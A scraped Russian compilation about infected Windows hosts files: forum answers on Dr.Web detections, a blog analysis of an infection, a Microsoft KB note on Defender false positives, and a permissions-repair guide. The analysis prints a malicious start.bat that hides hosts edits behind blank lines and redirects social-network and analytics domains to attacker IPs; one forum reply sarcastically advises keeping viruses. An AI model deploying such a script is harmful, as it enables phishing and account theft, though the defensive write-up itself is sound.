C windows system32 drivers etc hosts infected

Если вы видите это сообщение, значит, произошла проблема с загрузкой файлов в стилей (CSS) нашего сайта. Попробуйте сбросить кэш браузера (Ctrl+F5).
Если это не поможет, а вы находитесь в регионе, где возможны ограничения интернет-трафика с российских серверов — воспользуйтесь VPN.

2 раза запускала. 1-ый раз полную проверку, второй раз только диск С. После 1-ой удалила все, кроме 1-ой. Я нажала пропустить. Вдруг драйвера слетят? Угроза-вирус с системной папке, вдруг не вирус? C:\WINDOWS\system32\drivers\etc\hosts Что это за файл вообще? Драйвер?

Почему с первого раза утилита все не нашла? Почему после 2-го раза она не нашла первый файл, который я пропустила?

текст при наведении

Картинка с сайта: www.bolshoyvopros.ru

текст при наведении

Картинка с сайта: www.bolshoyvopros.ru

C:\WINDOWS\system32\drivers\etc\hosts — там часто вирусы вносят свои записи (это не драйвер). Как-то у меня антивирус Dr.Web Security Space обнаружил в файле hosts вирусные записи — я нажал — обезвредить и вирусные записи из файла hosts удалились (сам файл остался), вообще-то Dr.Web не должен удалять файл hosts а только лечить его от вирусных записей.

автор вопроса выбрал этот ответ лучшим

Maste­r key 111
[75.8K]

8 лет назад 

Да, вирусы и угрозы найденные Утилитой Доктором Веб лучше удалить, или если есть такая возможность вылечить зараженные файлы, судя по скрину у вас в вопросе среди зараженных нет важных файлов удаление которых могло бы негативно сказаться на работе компьютера, потому постарайтесь вылечить, а если не получится удаляйте.

Мираб­илис
[52.6K]

9 лет назад 

Никакой это не драйвер. Вирусы любят прописывать свои пути в файле hosts, и тогда могут не открываться какие-то сайты, а может быть вместо них откроются окна, похожие на настоящий сайт, но будет написано, что сайт заблокирован и без смс с вводом деньг не разблокируется. Злоумышленники так делают обычно с сайтами одноклассники, вконтакте и др.

Вирусы надо удалять, утилита Доктор Веб не трогает сам файл hosts, а удаляет из него вредоносные записи.

Главное самому не удалить папку etc. И не трогать файл hosts, если не знаете, что с ним делать.

Может быть второй раз утилита не нашла файл с вирусом, потому что запомнила, что его надо пропустить. Надо запустить еще раз полную проверку.

Помощ­ни к
[57.6K]

8 лет назад 

Я бы вам советовал при обнаружении угроз антивирусом, в первую очередь поинтересоваться в Интернете что именно вы собираетесь удалить. Часто некоторые программы вступают в конфликт с антивирусом и их необходимо заносить в исключения. Возможно, у вас аналогичный случай.

Если же по компьютеру явно видно, что вирус уже внутри (появляется реклама в браузерах, он тормозит), значит вероятно вирус заразил и маскируется под безопасной программой. В таком случае удаляйте.

alexm­12
[287K]

10 лет назад 

Ни в коем случае. Люди старались работали писали вирусы, забрасывали их на ваш компьютер для каких-то своих целей. А вы хотите их вот так просто взять и удалить? Уважайте чужой труд. Пусть найденные вирусы отошлют своим создателям ваши пароли на разные аккаунты и другую вашу личную информацию. Помогите создателям вирусов «ломать» другие компьютеры.

владс­андро­вич
[918K]

8 лет назад 

Сами вирусы обнаруженные Доктором Веб нужно конечно удалить. Потом, позовите того, кто умеет лечить файлы, так как эта работа, требует особых знаний и умений. Если файлы нельзя реанимировать, то тогда, все надо удалять и чистить, а то комп, будет все равно барохлить.

maste­rmiha
[103K]

8 лет назад 

Файл hosts очищать не следует, если знаете, что ничего лишнего в нем нет, а имеются только добавленные вами записи, чтобы не слетали активации программ или блокировались какие-то адреса.

А вот остальное удалять можно, конечно если уверены в том, что делаете, поскольку эта утилита и нормальные программы может подозревать в заражении вирусами.

Можно смело удалять, то что вас смутил путь в папке с драйверами C:\WINDOWS\system32\drivers\etc\host, на этом и рассчитывали создатели вредоносного кода,но так как вы пропустили данную угрозу, следующий раз антивирус просто её пропустит, необходимо найти данный файл в карантине или в исключениях ( в меню самого антивируса) и удалить.

Совсе­м Ку-ку
[13K]

7 лет назад 

Вирусы очень часто прописываются в файле Hosts, так как он находится в системной папке и в нее легко проникнуть. Поэтому всё то, что при проверке находит доктор веб необходимо удалять. Разработчики антивирусов создают свои программы так, чтобы они не удаляли нужные и файлы, в том числе и драйвера.

Любые угрозы и вирусы — обнаруженные антивирусной программой НУЖНО удалять…

я много лет пользовался антивирусом dr.web и ни разу никакие драйвера у меня не слетали…

так что можете смело удалять всё- что им обнаружено…

Знаете ответ?

Источник

подготовьте, пожалуйста, дополнительные логи:

Quote

+ образ автозапуска в uVS

Добавьте образ автозапуска системы в uVS.

1. Скачать архив программы можно отсюда:

2. Распакуйте данный архив с программой в отдельный каталог и запустите файл Start.exe
(для Vista, W7, W8, W10, W11 запускаем с правами администратора)
3. В стартовом окне программы — нажмите «запустить под текущим пользователем«
(если текущий пользователь с правами администратора).

4. Далее, меню «Файл» / Сохранить Полный образ автозапуска.

5. дождитесь, пока процесс создания файла образа завершится.
Сохраненный файл образа автозапуска (с именем Ваш_компьютер_дата_время.txt) автоматически добавится в архив 7z или rar.
6. Файл архива с образом автозапуска прикрепите к вашему сообщению на форуме. Ждем ответ.

Источник

Легкое проникновение или борьба с несложным вирусом

Время на прочтение3 мин

Количество просмотров5.7K

Захватывающее действие разворачивается на Вашем компьютере совсем неожиданно и, как правило, в самый неподходящий момент. Начинается все просто, Вы отправляетесь на свой любимый сайт или в социальную сеть и обнаруживаете что-то необычное…

Так случилось и с моим компьютером. Захожу на сайт, вижу в левом углу неприличную картинку (рекламный баннер). В голове промелькнуло 2 мысли:

  • заражен мой браузер
  • заражен сайт

Побродив по нескольким сайтам и не увидев этого самого баннера, я сделал вывод, что все-таки заражен сайт. Так как это был сайт довольно крупной компании, я позвонил в тех. поддержку. Выслушали, выразили благодарность за бдительность, но во время разговора сообщили, что у них этот баннер не отображается ни под одним браузером.

Анализ сайта

Начал исследовать сайт, и вижу, что в коде Яндекс метрики есть такая строчка:

<noscript><div><img src="//mc.yandex.ru/watch/image2.jpg" style="position:absolute; ..." alt=""></div></noscript>

Именно она и показывает баннер. Не совсем понятно, как это делается в теге , однако ясно, что ссылка на картинку фишинговая.

Файл hosts

Отправляемся в файлик hosts (%windir%\system32\drivers\etc\hosts).
И вот тут мной была допущена серьезная ошибка: открыл, посмотрел, все число, закрыл. Однако не обратил внимания на появившуюся полосу прокрутки.

Автозагрузка

Отправляемся в автозагрузку (Пуск->Выполнить->msconfig) и обнаруживаем там файлик start.bat со следующим содержимым:

FOR /L %%i IN (1,1,255) DO echo. >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 obhodilka.ru raskruty.ru jelya.ru pinun.ru websplatt.ru diazoom.ru anonim.ttu.su >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 webvpn.org unboo.ru anonim.do.am anonimvk.ru nemir.ru vkanonim.ru nezayti.ru >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 webmurk.ru waitplay.ru dostupest.ru anonimix.ru nekontakt2.ru hellhead.ru >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 razblokirovatdostup.ru antiblock.ru dardan.ru o.vhodilka.ru cameleo.ru spoolls.com >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 adminimus.ru netdostupa.com dostyp.ru anonymizer.ru xy4-anonymizer.ru v.vhodilka.ru >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 vhodilka.ru ok-anonimaizer.ru neklassniki.ru timp.ru urlbl.ru workandtalk.ru >> %windir%\system32\drivers\etc\hosts
echo 46.251.249.137 m.odnoklassniki.ru my.mail.ru www.odnoklassniki.ru vk.com odnoklassniki.ru m.vk.com wap.odnoklassniki.ru >> %windir%\system32\drivers\etc\hosts
echo 46.251.249.136 mc.yandex.ru admulti.com counter.rambler.ru counter.spylog.com www.google-analytics.com >> %windir%\system32\drivers\etc\hosts.txt

Становится понятно, первая строка батника в hosts создает 255 пустых строк. Именно поэтому, заглянув в hosts я ничего не увидел. Нужно было отправиться в самый конец, чтобы заметить модификацию.

Таким образом, на всех сайтах, на которых стоял Google Analytics и Яндекс метрика, появлялся этот рекламный баннер. А во всех социальных сетях подкладывался фишинговый сайт, где можно было легко предоставить доступ к своей страничке «неприятелю».

Стоило удалить из автозапуска батник, почистить hosts, как все встало на свои места. Способ проникновения вредителя на компьютер так и остался загадкой.

Заключение

Во всей этой истории удивительным остается следующее:

  • На компьютере стоял антивирус Касперского, который не подавал никаких признаков борьбы с модификацией файла hosts, добавлением батника в автозагрузку и появлением баннера (даже после полной проверки).
  • ОС Windows 7 совершенно спокойно разрешала исполнять start.bat при каждой загрузке.

Источник

Applies ToWindows 8 Windows 8 Pro Windows 8 Enterprise

Symptoms

Consider the following scenario:

  • You install Windows 8.

  • You change the Hosts file by specifying custom IP-address-to-host-name mappings to prevent users from browsing to some websites.

  • You run a scan in Microsoft Windows Defender.

Cause

This issue occurs because Windows Defender may determine incorrectly that the Hosts file was changed by malware, such as adware or spyware. Typically, malware programs change the Hosts file to redirect users to malicious websites. Therefore, Windows Defender may detect the Hosts file as a security threat.

Resolution

To resolve this issue, exclude the Hosts file from scanning in Windows Defender. To do this, follow these steps:

  1. Open Windows Defender.

  2. On the Settings tab, click Excluded files and locations.

  3. Under File locations, click Browse.

  4. Locate and then click the Hosts file.

    Note By default, the Hosts file is located in the %systemroot%\system32\drivers\etc folder.

  5. Click Add, and then click Save changes.

    Картинка с сайта: support.microsoft.com

  6. Exit Windows Defender.

References

For more information about the SettingsModifier:Win32/PossibleHostsFileHijack malware threat, go to the following Microsoft Malware Protection Center encyclopedia entry:

SettingsModifier:Win32/PossibleHostsFileHijack

For information about how to reset the Hosts file to the default settings, click the following article number to go to the article in the Microsoft Knowledge Base:

972034 How can I reset the Hosts file back to the default?

Need more help?

Want more options?

Explore subscription benefits, browse training courses, learn how to secure your device, and more.

Источник

Главная » 2023 » Май » 23 » Вирус на компьютере с Windows заблокировал файл Hosts, как его разблокировать?

Если файл Hosts на вашем компьютере с Windows заблокирован вирусом, вам стоит попробовать это:

  1. Отключите компьютер от Интернета: Это поможет предотвратить связь вируса с удаленным сервером и защитит ваши данные.

  2. Запустите антивирусное программное обеспечение: Убедитесь, что у вас установлена надежная антивирусная программа. Запустите полное сканирование системы и дайте программе удалить обнаруженные вредоносные программы. Если запустить антивирус не удается используйте Реаниматор Windows.

  3. Восстановите файл Hosts: После завершения сканирования вирусов вы можете попробовать восстановить файл Hosts.

Картинка с сайта: spec-komp.com

    • Откройте проводник Windows и перейдите по следующему пути: C:\Windows\System32\drivers\etc.

    • Найдите файл с именем «hosts». Щелкните правой кнопкой мыши на нем и выберите «Свойства».

    • В окне свойств выберите вкладку «Безопасность».

    • Нажмите кнопку «Редактировать» и выберите учетную запись пользователя, которую вы используете. Если редактирование не возможно получите админские права или разблокируйте доступ к файлам и папкам!

    • Убедитесь, что разрешения для вашей учетной записи включают чтение и запись, другие права включать не нужно!

    • Нажмите «ОК», чтобы сохранить изменения.

  1. Обновите антивирусное программное обеспечение и операционную систему: После разблокировки файла Hosts важно обновить ваше антивирусное программное обеспечение и операционную систему до последних версий, чтобы обеспечить защиту от новых угроз.

  2. Измените пароли: Если ваш компьютер был заражен вредоносной программой, рекомендуется изменить все пароли, используемые на компьютере, а также на других онлайн-сервисах, чтобы предотвратить несанкционированный доступ к вашей учетной записи.

Если вы не уверены в своих навыках в отношении компьютерной безопасности, рекомендуем обратиться к нам для помощи в разблокировке файла Hosts и очистке вашей системы от вредоносных программ.

Не могу отредактировать права для доступа к файлу hosts

Если у вас возникают проблемы с изменением прав доступа к файлу hosts, вам может потребоваться выполнить некоторые дополнительные шаги для получения требуемых разрешений. Попробуйте следующее:

    1. Убедитесь, что вы вошли в систему с учетной записью, имеющей права администратора: Для изменения прав доступа к системным файлам, таким как hosts, вам понадобятся права администратора. Удостоверьтесь, что вы выполнили вход в систему с учетной записью администратора или имеете соответствующие привилегии.

    2. Запустите проводник Windows с правами администратора: Щелкните правой кнопкой мыши на значке проводника Windows на рабочем столе или в меню «Пуск» и выберите «Запуск от имени администратора». Подтвердите действие, если появится запрос на подтверждение.

    3. Откройте файл Hosts в редакторе с правами администратора: Правой кнопкой мыши щелкните файл Hosts и выберите «Открыть с помощью» > «Блокнот» (или другой текстовый редактор). В диалоговом окне выбора программы отметьте опцию «Использовать другую программу» и найдите редактор (например, Блокнот) в списке. Перед тем как нажать «ОК», удостоверьтесь, что вы поставили галочку напротив «Запустить от имени администратора».

    4. Попробуйте изменить права доступа к файлу Hosts: В редакторе текста выберите «Файл» > «Сохранить» (Ctrl+S), чтобы сохранить изменения. Если по-прежнему не удается сохранить файл из-за ограничений доступа, попробуйте выполнить следующие шаги.

    5. Откройте командную строку с правами администратора: Нажмите клавишу Win+X, чтобы открыть меню «Пуск» или щелкните правой кнопкой мыши на кнопке «Пуск» и выберите «Командная строка (администратор)» или «Windows PowerShell (администратор)».

    6. В командной строке введите следующую команду и нажмите Enter:

  • takeown /f C:\Windows\System32\drivers\etc\hosts - Эта команда предоставит вам владение файлом Hosts.
  • Затем введите следующую команду и нажмите Enter: icacls C:\Windows\System32\drivers\etc\hosts /grant [ваше_имя_пользователя]:(F)

Замените [ваше_имя_пользователя] на свое имя пользователя без скобок. Эта команда предоставит вам полные разрешения на файл Hosts.


Попробуйте отредактировать и сохранить файл Hosts в редакторе текста с правами администратора еще раз.
  • 1
  • 2
  • 3
  • 4
  • 5

Категория: Новости Software(софт) |
Просмотров: 4848 |

| Рейтинг: 5.0/1

Источник

Понравилась статья? Поделить с друзьями:
0 0 голоса
Рейтинг статьи
Подписаться
Уведомить о
guest

0 комментариев
Старые
Новые Популярные
Межтекстовые Отзывы
Посмотреть все комментарии
  • Windows xp sp3 какого года
  • Что делать если микрофон на наушниках не работает на windows 10
  • A problem has been detected and windows has been shut down что делать 0x0000007e
  • Зачем надо активировать windows 10 на пк
  • Process monitor unable to load process monitor device driver windows 7